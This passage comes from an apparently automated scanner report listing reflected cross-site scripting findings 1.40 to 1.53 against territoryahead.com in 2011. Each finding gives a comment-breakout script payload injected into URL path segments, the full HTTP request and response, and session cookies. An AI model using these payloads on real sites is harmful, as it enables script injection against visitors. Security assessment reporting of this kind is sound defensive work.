REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/cm/cmdatatagutils_territoryahead.js876b8-->
...[SNIP]...

1.40. http://www.territoryahead.com/text/cm/cmtaggingservices_TTA_bottom.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/cm/cmtaggingservices_TTA_bottom.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 14102--><script>alert(1)</script>fe5c691b78e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text14102--><script>alert(1)</script>fe5c691b78e/cm/cmtaggingservices_TTA_bottom.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:17:18 GMT
Server: Apache
ETag: "AAAAS53+5qP"
Last-Modified: Wed, 02 Mar 2011 19:11:41 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: wu2qGawSrRQAAG6FzIoAAAAO
REDIRECT_SCRIPT_URL: /text14102--><script>alert(1)</script>fe5c691b78e/cm/cmtaggingservices_TTA_bottom.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text14102-->
...[SNIP]...

1.41. http://www.territoryahead.com/text/cm/cmtaggingservices_TTA_bottom.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/cm/cmtaggingservices_TTA_bottom.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload ab577--><script>alert(1)</script>0084ffb2ffb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/cmab577--><script>alert(1)</script>0084ffb2ffb/cmtaggingservices_TTA_bottom.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:26:28 GMT
Server: Apache
ETag: "AAAAS53+6CO"
Last-Modified: Wed, 02 Mar 2011 19:11:42 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 47MZm6wSrSgAAGSt-sEAAAAM
REDIRECT_SCRIPT_URL: /text/cmab577--><script>alert(1)</script>0084ffb2ffb/cmtaggingservices_TTA_bottom.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/cmab577-->
...[SNIP]...

1.42. http://www.territoryahead.com/text/cm/cmtaggingservices_TTA_bottom.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/cm/cmtaggingservices_TTA_bottom.js

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload fc136--><script>alert(1)</script>67c581b4d0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/cm/cmtaggingservices_TTA_bottom.jsfc136--><script>alert(1)</script>67c581b4d0f HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:26:30 GMT
Server: Apache
ETag: "AAAAS53+6eg"
Last-Modified: Wed, 02 Mar 2011 19:11:44 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 487bdawSrSgAAD2JIk4AAAAh
REDIRECT_SCRIPT_URL: /text/cm/cmtaggingservices_TTA_bottom.jsfc136--><script>alert(1)</script>67c581b4d0f
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/cm/cmtaggingservices_TTA_bottom.jsfc136-->
...[SNIP]...

1.43. http://www.territoryahead.com/text/cm/eluminate.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/cm/eluminate.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload d9eba--><script>alert(1)</script>56ca91e0499 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /textd9eba--><script>alert(1)</script>56ca91e0499/cm/eluminate.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:26:34 GMT
Server: Apache
ETag: "AAAAS53+7ln"
Last-Modified: Wed, 02 Mar 2011 19:11:49 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 5BRRcawSrSgAAAIpggAAAAAJ
REDIRECT_SCRIPT_URL: /textd9eba--><script>alert(1)</script>56ca91e0499/cm/eluminate.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/textd9eba-->
...[SNIP]...

1.44. http://www.territoryahead.com/text/cm/eluminate.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/cm/eluminate.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload fd889--><script>alert(1)</script>fe7567650a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/cmfd889--><script>alert(1)</script>fe7567650a7/eluminate.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:26:36 GMT
Server: Apache
ETag: "AAAAS53+8Dl"
Last-Modified: Wed, 02 Mar 2011 19:11:51 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 5DFt1awSrSgAAGQps4gAAAAx
REDIRECT_SCRIPT_URL: /text/cmfd889--><script>alert(1)</script>fe7567650a7/eluminate.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/cmfd889-->
...[SNIP]...

1.45. http://www.territoryahead.com/text/cm/eluminate.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/cm/eluminate.js

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload e3a7f--><script>alert(1)</script>1ac82b72f80 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/cm/eluminate.jse3a7f--><script>alert(1)</script>1ac82b72f80 HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:26:38 GMT
Server: Apache
ETag: "AAAAS53+8bX"
Last-Modified: Wed, 02 Mar 2011 19:11:52 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
ie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 5EjHR6wSrSgAAF3LF5cAAAAL
REDIRECT_SCRIPT_URL: /text/cm/eluminate.jse3a7f--><script>alert(1)</script>1ac82b72f80
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/cm/eluminate.jse3a7f-->
...[SNIP]...

1.46. http://www.territoryahead.com/text/css/tta_stylesheet.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/css/tta_stylesheet.css

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload b9319--><script>alert(1)</script>55d99e12a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /textb9319--><script>alert(1)</script>55d99e12a4/css/tta_stylesheet.css HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:15:44 GMT
Server: Apache
ETag: "AAAAS53+in8"
Last-Modified: Wed, 02 Mar 2011 19:10:06 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: vU3mk6wSrRQAAHbd-MwAAAAU
REDIRECT_SCRIPT_URL: /textb9319--><script>alert(1)</script>55d99e12a4/css/tta_stylesheet.css
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/textb9319-->
...[SNIP]...

1.47. http://www.territoryahead.com/text/css/tta_stylesheet.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/css/tta_stylesheet.css

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 3b0b3--><script>alert(1)</script>c8399a24e0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/css3b0b3--><script>alert(1)</script>c8399a24e0e/tta_stylesheet.css HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:15:45 GMT
Server: Apache
ETag: "AAAAS53+jFA"
Last-Modified: Wed, 02 Mar 2011 19:10:08 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: vWpFiKwSrRQAABOyNFwAAAC5
REDIRECT_SCRIPT_URL: /text/css3b0b3--><script>alert(1)</script>c8399a24e0e/tta_stylesheet.css
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/css3b0b3-->
...[SNIP]...

1.48. http://www.territoryahead.com/text/css/tta_stylesheet.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/css/tta_stylesheet.css

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload c3030--><script>alert(1)</script>0d322327f28 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/css/tta_stylesheet.cssc3030--><script>alert(1)</script>0d322327f28 HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:24:56 GMT
Server: Apache
ETag: "AAAAS53+juj"
Last-Modified: Wed, 02 Mar 2011 19:10:11 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
er=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 3kDtuawSrSgAAGQksbAAAAAa
REDIRECT_SCRIPT_URL: /text/css/tta_stylesheet.cssc3030--><script>alert(1)</script>0d322327f28
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/css/tta_stylesheet.cssc3030-->
...[SNIP]...

1.49. http://www.territoryahead.com/text/css/tta_stylesheet_ie7.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/css/tta_stylesheet_ie7.css

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 3e903--><script>alert(1)</script>05a8b0354fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text3e903--><script>alert(1)</script>05a8b0354fb/css/tta_stylesheet_ie7.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.territoryahead.com

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:26:53 GMT
Server: Apache
ETag: "AAAAS53/mkO"
Last-Modified: Wed, 02 Mar 2011 19:14:45 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62381267; Path=/; Expires=Wed, 16-Mar-2011 19:14:44 GMT
Set-Cookie: customer=92645295; Path=/; Expires=Thu, 28-Feb-2019 19:14:44 GMT
Set-Cookie: mmlID=68410017; Path=/; Expires=Thu, 28-Feb-2019 19:14:44 GMT
Set-Cookie: JSESSIONID=cKxpSWibsLxe; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
RECT_UNIQUE_ID: 5Tb0v6wSrSgAAAIpggsAAAAJ
REDIRECT_nokeepalive: 1
REDIRECT_ssl-unclean-shutdown: 1
REDIRECT_downgrade-1.0: 1
REDIRECT_force-response-1.0: 1
REDIRECT_SCRIPT_URL: /text3e903--><script>alert(1)</script>05a8b0354fb/css/tta_stylesheet_ie7.css
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text3e903-->
...[SNIP]...

1.50. http://www.territoryahead.com/text/css/tta_stylesheet_ie7.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/css/tta_stylesheet_ie7.css

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload b6d61--><script>alert(1)</script>2033e9dffd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/cssb6d61--><script>alert(1)</script>2033e9dffd6/tta_stylesheet_ie7.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.territoryahead.com

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:17:49 GMT
Server: Apache
ETag: "AAAAS53/BL6"
Last-Modified: Wed, 02 Mar 2011 19:12:12 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62381459; Path=/; Expires=Wed, 16-Mar-2011 19:12:11 GMT
Set-Cookie: customer=92645631; Path=/; Expires=Thu, 28-Feb-2019 19:12:11 GMT
Set-Cookie: mmlID=68409929; Path=/; Expires=Thu, 28-Feb-2019 19:12:11 GMT
Set-Cookie: JSESSIONID=ezBIbztmGMC4; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
_UNIQUE_ID: xMJlyKwSrRQAAG-3DioAAAAA
REDIRECT_nokeepalive: 1
REDIRECT_ssl-unclean-shutdown: 1
REDIRECT_downgrade-1.0: 1
REDIRECT_force-response-1.0: 1
REDIRECT_SCRIPT_URL: /text/cssb6d61--><script>alert(1)</script>2033e9dffd6/tta_stylesheet_ie7.css
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/cssb6d61-->
...[SNIP]...

1.51. http://www.territoryahead.com/text/css/tta_stylesheet_ie7.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/css/tta_stylesheet_ie7.css

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload fbd0e--><script>alert(1)</script>53a79b9814f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/css/tta_stylesheet_ie7.cssfbd0e--><script>alert(1)</script>53a79b9814f HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.territoryahead.com

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:17:52 GMT
Server: Apache
ETag: "AAAAS53/CEF"
Last-Modified: Wed, 02 Mar 2011 19:12:15 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62381472; Path=/; Expires=Wed, 16-Mar-2011 19:12:15 GMT
Set-Cookie: customer=92645644; Path=/; Expires=Thu, 28-Feb-2019 19:12:15 GMT
Set-Cookie: mmlID=68409942; Path=/; Expires=Thu, 28-Feb-2019 19:12:15 GMT
Set-Cookie: JSESSIONID=e-KL377LcFYf; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
AAG-4D0UAAAAE
REDIRECT_nokeepalive: 1
REDIRECT_ssl-unclean-shutdown: 1
REDIRECT_downgrade-1.0: 1
REDIRECT_force-response-1.0: 1
REDIRECT_SCRIPT_URL: /text/css/tta_stylesheet_ie7.cssfbd0e--><script>alert(1)</script>53a79b9814f
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/css/tta_stylesheet_ie7.cssfbd0e-->
...[SNIP]...

1.52. http://www.territoryahead.com/text/js/displayfunctions.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/js/displayfunctions.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload f47e2--><script>alert(1)</script>f2a49a5e572 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /textf47e2--><script>alert(1)</script>f2a49a5e572/js/displayfunctions.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:17:42 GMT
Server: Apache
ETag: "AAAAS53+/d5"
Last-Modified: Wed, 02 Mar 2011 19:12:04 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: xFicX6wSrRQAAHa3-lwAAAAB
REDIRECT_SCRIPT_URL: /textf47e2--><script>alert(1)</script>f2a49a5e572/js/displayfunctions.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/textf47e2-->
...[SNIP]...

1.53. http://www.territoryahead.com/text/js/displayfunctions.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/js/displayfunctions.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload b4da4--><script>alert(1)</script>2a78501926d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

